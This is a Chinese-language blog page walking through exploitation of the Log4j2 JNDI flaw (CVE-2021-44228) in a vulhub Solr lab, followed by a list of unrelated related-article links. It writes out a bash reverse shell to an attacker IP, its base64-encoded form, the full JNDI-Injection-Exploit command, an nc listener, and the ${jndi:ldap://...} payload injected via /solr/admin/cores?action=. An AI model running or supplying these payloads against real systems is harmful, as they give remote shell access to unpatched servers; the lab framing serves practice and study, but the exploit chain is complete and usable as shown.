当前位置: 首页 > news >正文

代码执行漏洞-Log4j2漏洞 vulhub CVE-2021-44228

步骤一:执行以下命令启动靶场环境并在浏览器访问!!!

查看端口

浏览器访问

可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload

JDNI项⽬地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

# 反弹shell bash -i >& /dev/tcp/192.168.10.235/8888 0>&1

# 反弹Shell-base64加密 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzNS84ODg4IDA+JjE=

# 最终Payload java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzNS84ODg4IDA+JjE=}|{base64,-d}|{bash, -i}" -A "192.168.10.235"

开启监听 nc -lvvp 8888

在页面访问语句/solr/admin/cores?action=${jndi:ldap://192.168.10.235:1389/g3fjso}${jndi:ldap://192.168.10.235:8888/uma7pn}

反弹shell

http://www.lryc.cn/news/432915.html

相关文章:

  • uniapp / uniapp x UI 组件库推荐大全
  • 花8000元去培训机构学习网络安全值得吗,学成后就业前景如何?
  • PhpStorm 下调试功能配置
  • MVC(Model-View-Controller)和MVVM(Model-View-ViewModel)
  • 【H2O2|全栈】关于HTML(4)HTML基础(三)
  • 关于找不到插件 ‘org.springframework.boot:spring-boot-maven-plugin:‘的解决方案
  • 深入RabbitMQ世界:探索3种队列、4种交换机、7大工作模式及常见概念
  • 将目标检测模型导出到C++|RT-DETR、YOLO-NAS、YOLOv10、YOLOv9、YOLOv8
  • 【Windows】解决新版 Edge 浏览器开机自启问题(简单有效)
  • 如何给3D人物换衣服CC4
  • 如何对列表、字符串进行分组
  • 【GEE代码实例教程详解:NDVI时间序列趋势分析】
  • 51单片机-DS1302(RTC实时时钟芯片)
  • FreeRTOS学习笔记—②RTOS的认识及任务管理篇
  • 【C++从练气到飞升】22---C++中的异常
  • 前端:HTML、CSS、JS、Vue
  • RocksDB简介
  • [VC] Visual Studio中读写权限冲突
  • ChatGPT3.5/4.0新手使用手册,国内中文版使用教程
  • 基于MicroPython的ESP8266与超声波传感器设计方案
  • 仿华为车机UI--图标从Workspace拖动到Hotseat同时保留图标在原来位置
  • C++ 中的 override 和 overload的区别
  • spring boot3框架@Validated失效
  • UE5引擎工具链知识点
  • Python的图像算术与逻辑运算详解
  • WSL 下的 CentOS 装 Docker
  • v0.dev快速开发
  • python之字符串
  • 算法打卡 Day28(回溯算法)-组合总数 + 组合总数 Ⅱ+ 电话号码的字母组合
  • 【Hadoop|MapReduce篇】MapReduce概述